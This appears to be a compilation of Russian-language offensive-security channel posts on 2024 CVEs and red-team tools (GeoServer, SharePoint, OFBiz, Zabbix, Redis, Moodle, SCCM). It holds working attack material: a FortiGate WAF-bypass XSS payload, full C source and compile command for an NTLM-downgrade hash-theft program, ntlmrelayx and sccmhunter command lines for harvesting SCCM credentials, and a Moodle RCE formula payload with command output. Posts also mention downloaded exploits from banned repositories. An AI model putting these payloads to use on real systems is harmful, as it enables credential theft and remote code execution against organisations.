Еще одна картошка)) Абузит RPCSS в DCOM при обработке OXID

https://github.com/lypd0/DeadPotato

#lpe #potato #ad #pentest #redteam

CVE-2024-36401 GeoServer
*
POC мы уже публиковали, но тут прям fullH0use
*
Полный exploit + модуль для Mass Scanning
*
Download exploit

Leaked Wallpaper

This is a privilege escalation tool (fixed with CVE-2024-38100 in KB5040434) that allows us to leak a user's NetNTLM hash from any session on the computer, even if we are working from a low-privileged user.
https://github.com/MzHmO/LeakedWallpaper

■■■■■ WAF Fortinet FortiGate XSS Bypass:

<details open ontoggle="(()=>alert

ibrahimxss)()"></details>

Source: https://x.com/ibrahimxss_/status/1819772406988231000

Снова Apache #OFBiz ERP #RCE #CVE-2024-38856

Коренная причина уязвимости кроется в недостатках механизма аутентификации

CVSS score of 9.8 / 10.0.

Она затрагивает Apache OFBiz все версии до 18.12.15.

https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html

Big thanks Aman for news

RCE через Microsoft SharePoint Server 2019

Microsoft SharePoint — веб-платформа для совместной работы, управления документами и организации совместного доступа к информации в организациях, которая широко используется в корпоративной среде.

Недавно увидел интересные CVE которые затрагивают эту веб-платформу:

CVE-2024-38094
CVE-2024-38024
CVE-2024-38023

Чтобы успешно эксплуатировать RCE, необходимо выполнить несколько условий, а именно
1) Сетевой доступ к уязвимому серверу SharePoint.
2) Учетные данные (лог/пасс) для NTLM аутентификации + учетная запись должна иметь права на создание файлов и папок.

Для успешной эксплуатации уязвимости предоставляется три скрипта: poc_filtered.py, poc_specific.py и poc_sub.py. Сейчас коротко разберем суть и как они работают.

Все три скрипта используют NTLM аутентификацию для доступа к API SharePoint и выполняют схожие действия:

Скрипты сначала аутентифицируются на сервере SharePoint с использованием предоставленных учетных данных. Затем они создают необходимые папки на сервере, такие как BusinessDataMetadataCatalog, отправляя POST-запросы к API SharePoint по пути /api/web/Folders.

Далее создается и загружается файл метаданных BDCMetadata.bdcm, содержащий информацию для выполнения уязвимости. В информации находятся команды для выполнения различных методов SharePoint, таких как GetCreatorView, GetDefaultValues, GetFilters и FindFiltered. Эти методы позволяют взаимодействовать с объектами и данными SharePoint, что в конечном итоге позволяет выполнить произвольный код.

То есть после запуска poc_filtered.py создается новая папка BusinessDataMetadataCatalog, после чего скрипт получает и сохраняет значение X-RequestDigest для дальнейших запросов. X-RequestDigest — это токен, подтверждающий, что запрос исходит от подлинного пользователя. Этот токен включается в заголовки последующих запросов для подтверждения их подлинности. Затем скрипт создает и загружает файл метаданных BDCMetadata.bdcm в созданную папку. Этот файл содержит данные и команды, которые будут использоваться для выполнения уязвимости. В конце, скрипт отправляет специально сформированный XML-запрос к API SharePoint для выполнения уязвимых методов, что позволяет выполнить произвольный код на сервере.

Но между скриптами есть небольшая разница, а именно в используемых методах.

1) poc_filtered.py использует метод FindFiltered для взаимодействия с объектами SharePoint.
2) poc_specific.py использует метод FindSpecific для выполнения конкретных задач и команд.
3) poc_sub.py в этом скрипте используется метод Subscribe для подписки на события или действия.

PoC
PoC Video

CVE-2024-21683 0-click RCE
*
Затронуты версии от Win server 2000 до Win server 2025
*
Дырка в службе лицензирования удаленных рабочих столов Windows (RDL), в инет сейчас торчит 170 000 таких хостов
*
Пропатчено в июле
*
Exploit (репозитории банят, но мы скачали)))

#rce #winsrv

Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin. С правами local admin вы можете с помощью манипуляции ключами реестра сделать downgrade NTLM аутентификации до NetNTLMv1 и получить уже хеш, который можно восстановить в NTLM хеш в независимости от сложности пароля пользователя. Для этой цели я написал небольшую программу, которая бэкапит текущие настройки реестра, затем делает downgrade и через 60 сек восстанавливает все обратно.

#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep

void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
    HKEY hKey;
    DWORD value;
    DWORD valueSize = sizeof(DWORD);

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
        RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
        RegCloseKey(hKey);
        *oldValue = value;
    } else {
        printf("Ошибка чтения ключа реестра.\n");
    }
}

void SetRegKey(const char* path, const char* key, DWORD newValue) {
    HKEY hKey;

    if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
        RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
        RegCloseKey(hKey);
    } else {
        printf("Ошибка записи ключа реестра.\n");
    }
}

void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);

    GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}

void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
    SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}

int main() {
    DWORD oldValue_LMCompatibilityLevel = 0;
    DWORD oldValue_NtlmMinClientSec = 0;
    DWORD oldValue_RestrictSendingNTLMTraffic = 0;

    ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);

    // Задержка 60 секунд
    sleep(60);

    NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);

    return 0;
}

Компилируем так

x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c

В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.

#CVE-2024-22116 Critical RCE в Zabbix Monitoring Solution

An administrator with restricted permissions can exploit the lack of default escaping for script parameters.

CVSS 9.9

The vulnerability affects the following versions of Zabbix:
6.4.0 to 6.4.15
7.0.0alpha1 to 7.0.0rc2

Zabbix has addressed this issue in the following fixed versions:
6.4.16rc1
7.0.0rc3

https://support.zabbix.com/browse/ZBX-25016

CVE-2022-24834 Redis
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC

#redis #rce

Пс, там известная шпаргалка "TheHackerRecipes" переехала на собственный сайт.

This project is aimed at providing technical guides on various hacking topics. The most advanced topics are Active Directory and Web services.

https://www.thehacker.recipes/

Продолжим тему интересных вопросов с собесов, которые когда-то не вошли в подкаст :)) Думаю, все знают про MachineAccountQuota — количество компьютерных УЗ, которые могут добавлять пользователи в домен. Дефолтное значение 10. Однако, как этим злоупотреблять? В основном все вспоминают следующие основные кейсы:
- NTLM Relay / иной функционал абуза , для эксплуатации которого требуется компьютерная учетная запись, например, настройка RBCD
- Небезопасные ACL компьютерных учетных записей домена

Впрочем, есть еще один интересный вектор, который связан с SCCM и NAA (Network Access Accounts). Это специальные аккаунты, которые предоставляются SCCMом для того, чтобы клиент мог получить доступ к Distribution Point для загрузки необходимых файлов. Учетные данные от NAA в большинстве своем пушатся абсолютно на все компьютеры, управляемые SCCMом.

Если вдруг у передаваемой учетки недостаточно порезаны права, то у нас появляется вектор повышения привилегий :)

Итак, кейс первый. MAQ > 0 (или мы хакнули компьютерную УЗ). В таком случае берем инструмент sccmhunter и запускаем его следующим образом:

python sccmhunter.py http -auto -u pentest -p lolkekcheb123! -d abc.ru -dc-ip 192.168.0.1

Ключ -auto автоматически создаст УЗ. Можно указать уже существующую через -cp , -cn.

Однако, что если MAQ = 0? В таком случае мы можем осуществить ретрансляцию существующих кред любой машинной УЗ на SCCM и извлечь NAA-креды. Для этого берем форк , запускаем:

python3 ntlmrelayx.py -t http://sccm.sccmlab.local/ccm_system_windowsauth/request --sccm --sccm-device test12345 --sccm-fqdn sccm.sccmlab.local --sccm-sleep 10 -smb2support

-t <- Site Server, на который релеим
—sccm-device <- произвольное имя, которое появится в админке SCCM. Это имя как бы добавляемого устройства
—sccm-sleep <- таймаут, в течение которого ждать получения политики

Далее триггерим любым удобным способом любой компьютер. ntlmrelayx сдампит для нас любезно файл naapolicy.xml с учетными данными от NAA-аккаунта, которые можно расшифровать так, как показано в блоге.

https://blog.redteam-pentesting.de/2024/moodle-rce/

RCE в системе, которую любят использовать вузы во всем мире.

1. Создать вычисляемый вопрос
2. Изменить формулу ответа на

(1)->{system($_GET[chr(97)])}

3. Сохранить
4. Добавить к URL &a=id или любую другую команду

uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>

<html  dir="ltr" lang="en" xml:lang="en">
<head>
    <title>Editing a Calculated question | Test</title>
[...]